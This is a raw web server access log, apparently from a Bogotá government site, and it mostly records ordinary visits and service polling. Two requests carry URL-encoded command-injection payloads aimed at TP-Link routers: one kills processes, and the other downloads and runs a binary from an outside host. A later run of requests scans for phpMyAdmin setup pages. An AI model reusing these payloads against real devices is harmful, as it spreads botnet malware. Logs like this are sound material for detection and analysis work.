191.156.191.83 - - [03/Jul/2024:07:54:16 -0500] "GET /appsia/controlador HTTP/1.1" 200 5437
216.245.221.92 - - [03/Jul/2024:07:54:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:07:54:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:07:54:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
172.22.2.4 - - [03/Jul/2024:07:54:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
172.22.2.4 - - [03/Jul/2024:07:53:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:07:55:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
190.27.103.2 - - [03/Jul/2024:07:55:44 -0500] "GET /forest/login.do HTTP/1.1" 404 1120
66.249.77.165 - - [03/Jul/2024:07:56:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1072.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Jul/2024:07:56:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:07:54:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [03/Jul/2024:07:56:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.155.18.159 - - [03/Jul/2024:07:56:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2015%2F HTTP/1.1" 200 131252
186.155.18.159 - - [03/Jul/2024:07:56:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/3058.pdf HTTP/1.1" 200 793612
186.155.18.159 - - [03/Jul/2024:07:56:56 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 588817
207.46.13.141 - - [03/Jul/2024:07:57:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0512.pdf HTTP/1.1" 200 253574
201.245.192.253 - - [03/Jul/2024:07:57:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.155.18.159 - - [03/Jul/2024:07:57:36 -0500] "GET /BLA/resoluciones/AUTOS%202015/1944.pdf HTTP/1.1" 200 639073
201.245.192.253 - - [03/Jul/2024:07:58:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:07:58:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
91.92.247.64 - - [03/Jul/2024:07:58:27 -0500] "HEAD / HTTP/1.0" 200 -
91.92.247.64 - - [03/Jul/2024:07:58:30 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Jul/2024:07:58:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [03/Jul/2024:07:59:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:07:59:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.148.10.174 - - [03/Jul/2024:07:59:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [03/Jul/2024:07:59:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [03/Jul/2024:08:00:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [03/Jul/2024:08:00:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.28.40.114 - - [03/Jul/2024:08:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/3351.pdf HTTP/1.1" 200 867467
186.28.40.114 - - [03/Jul/2024:08:01:07 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [03/Jul/2024:07:59:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:08:01:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:08:00:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
172.22.2.4 - - [03/Jul/2024:08:02:10 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
201.245.192.253 - - [03/Jul/2024:08:02:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:08:02:10 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
190.146.129.42 - - [03/Jul/2024:08:02:13 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [03/Jul/2024:08:02:16 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=Aire&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:16 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=Aire&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:16 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=Aire&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:16 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=Aire&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:17 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=Aire&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:23 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=competencia-estructura&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:28 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=concesion&ano=2022&resuelve=gas HTTP/1.1" 200 454
201.245.192.253 - - [03/Jul/2024:08:02:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:08:02:35 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=emisiones&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:35 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=emisiones&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:40 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=fauna&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:46 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=flora&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:50 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=hidrocarburos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:02:50 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=hidrocarburos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:01 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=humedales&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:01 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=humedales&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:08 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=licencia&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:08 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=licencia&ano=2022&resuelve=gas HTTP/1.1" 200 454
186.155.18.159 - - [03/Jul/2024:08:03:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2009%2F HTTP/1.1" 200 400854
186.155.18.159 - - [03/Jul/2024:08:03:11 -0500] "GET /BLA/resoluciones/AUTOS%202009/2200.pdf HTTP/1.1" 200 113792
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
190.145.240.146 - - [03/Jul/2024:08:03:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [03/Jul/2024:08:03:14 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=mineria&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:14 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=mineria&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:14 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=mineria&ano=2022&resuelve=gas HTTP/1.1" 200 454
201.245.192.253 - - [03/Jul/2024:08:03:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
172.22.2.4 - - [03/Jul/2024:08:03:23 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=pma&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:24 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=pma&ano=2022&resuelve=gas HTTP/1.1" 200 454
66.249.77.164 - - [03/Jul/2024:08:03:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202251-2300/00002285.tif HTTP/1.1" 200 106620
172.22.2.4 - - [03/Jul/2024:08:03:28 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=publicidad&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:28 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=publicidad&ano=2022&resuelve=gas HTTP/1.1" 200 454
190.145.240.146 - - [03/Jul/2024:08:03:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 3601
190.145.240.146 - - [03/Jul/2024:08:03:28 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
172.22.2.4 - - [03/Jul/2024:08:03:32 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=residuos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:32 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=residuos&ano=2022&resuelve=gas HTTP/1.1" 200 454
190.145.240.146 - - [03/Jul/2024:08:03:33 -0500] "POST /appsia/controlador HTTP/1.1" 200 3601
190.145.240.146 - - [03/Jul/2024:08:03:33 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
190.145.240.146 - - [03/Jul/2024:08:03:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [03/Jul/2024:08:03:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:08:03:39 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=ruido&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:39 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=ruido&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:44 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=salvoconductos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:44 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=salvoconductos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:49 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=silvicultura&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:49 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=silvicultura&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:49 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=silvicultura&ano=2022&resuelve=gas HTTP/1.1" 200 454
190.145.240.146 - - [03/Jul/2024:08:03:50 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
190.145.240.146 - - [03/Jul/2024:08:03:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 7732
190.145.240.146 - - [03/Jul/2024:08:03:53 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [03/Jul/2024:08:03:54 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=vertimientos&ano=2022&resuelve=gas HTTP/1.1" 200 454
172.22.2.4 - - [03/Jul/2024:08:03:54 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Decreto&sector=vertimientos&ano=2022&resuelve=gas HTTP/1.1" 200 454
190.145.240.146 - - [03/Jul/2024:08:03:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.145.240.146 - - [03/Jul/2024:08:03:57 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.145.240.146 - - [03/Jul/2024:08:03:57 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
190.145.240.146 - - [03/Jul/2024:08:03:57 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
201.245.192.253 - - [03/Jul/2024:08:04:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
200.119.125.66 - - [03/Jul/2024:08:04:11 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.119.125.66 - - [03/Jul/2024:08:04:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.48.255.196 - - [03/Jul/2024:08:04:19 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.48.255.196 - - [03/Jul/2024:08:04:19 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.48.255.196 - - [03/Jul/2024:08:04:19 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.48.255.196 - - [03/Jul/2024:08:04:19 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.48.255.196 - - [03/Jul/2024:08:04:19 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
200.119.125.66 - - [03/Jul/2024:08:04:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 11471
200.119.125.66 - - [03/Jul/2024:08:04:21 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
216.245.221.92 - - [03/Jul/2024:08:04:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Jul/2024:08:04:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.32.213.124 - - [03/Jul/2024:08:05:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.32.213.124 - - [03/Jul/2024:08:05:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.32.213.124 - - [03/Jul/2024:08:05:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 7728
181.32.213.124 - - [03/Jul/2024:08:05:15 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
201.245.192.253 - - [03/Jul/2024:08:05:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
190.145.240.146 - - [03/Jul/2024:08:06:03 -0500] "GET /appsia/controlador HTTP/1.1" 200 5437
190.145.240.146 - - [03/Jul/2024:08:06:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [03/Jul/2024:08:06:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.145.240.146 - - [03/Jul/2024:08:06:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
190.145.240.146 - - [03/Jul/2024:08:06:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 7740
201.245.192.253 - - [03/Jul/2024:08:06:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [03/Jul/2024:08:05:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Jul/2024:08:07:30 -0500] "GET /BLA/boletinlegal/.well-known/traffic-advice HTTP/1.1" 404 1038
201.245.192.253 - - [03/Jul/2024:08:07:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
173.252.87.114 - - [03/Jul/2024:08:07:44 -0500] "GET /participa-en-la-convocatoria-para-el-aseguramiento-metrologico-de-la-red-de-monitoreo-de-calidad-del-aire-de-bogota.html HTTP/1.1" 200 848
172.22.2.4 - - [03/Jul/2024:08:06:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [03/Jul/2024:08:08:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [03/Jul/2024:08:07:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [03/Jul/2024:08:08:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38894
172.22.2.4 - - [03/Jul/2024:08:07:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [03/Jul/2024:08:08:35 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
175.178.40.24 - - [03/Jul/2024:08:08:44 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:44 -0500] "GET http://190.27.245.106:80/phpmyadmin/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:45 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:46 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:46 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:47 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:47 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:48 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:49 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:49 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:50 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:50 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:51 -0500] "GET http://190.27.245.106:80/pma/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:08:52 -0500] "GET http://190.27.245.106:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:52 -0500] "GET http://190.27.245.106:80/myadmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:08:54 -0500] "GET http://190.27.245.106:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:08:55 -0500] "GET http://190.27.245.106:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:55 -0500] "GET http://190.27.245.106:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:08:56 -0500] "GET http://190.27.245.106:80/SQL/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:08:56 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:57 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:58 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:58 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:08:59 -0500] "GET http://190.27.245.106:80/admin/pma/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:00 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:09:00 -0500] "GET http://190.27.245.106:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:01 -0500] "GET http://190.27.245.106:80/webadmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:01 -0500] "GET http://190.27.245.106:80/admin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:02 -0500] "GET http://190.27.245.106:80/dbadmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:03 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:03 -0500] "GET http://190.27.245.106:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 403 1165
175.178.40.24 - - [03/Jul/2024:08:09:04 -0500] "GET http://190.27.245.106:80/phpma/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:05 -0500] "GET http://190.27.245.106:80/sqlweb/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:05 -0500] "GET http://190.27.245.106:80/webdb/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:06 -0500] "GET http://190.27.245.106:80/websql/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:06 -0500] "GET http://190.27.245.106:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:07 -0500] "GET http://190.27.245.106:80/php/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:09 -0500] "GET http://190.27.245.106:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:09 -0500] "GET http://190.27.245.106:80/db/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:10 -0500] "GET http://190.27.245.106:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:10 -0500] "GET http://190.27.245.106:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:11 -0500] "GET http://190.27.245.106:80/phpmanager/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:12 -0500] "GET http://190.27.245.106:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:12 -0500] "GET http://190.27.245.106:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 1018
175.178.40.24 - - [03/Jul/2024:08:09:13 -0500] "GET http://190.27.245.106:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 1018
181.56.45.75 - - [03/Jul/2024:08:09:19 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.56.45.75 - - [03/Jul/2024:08:09:19 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.56.45.75 - - [03/Jul/2024:08:09:19 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.56.45.75 - - [03/Jul/2024:08:09:19 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
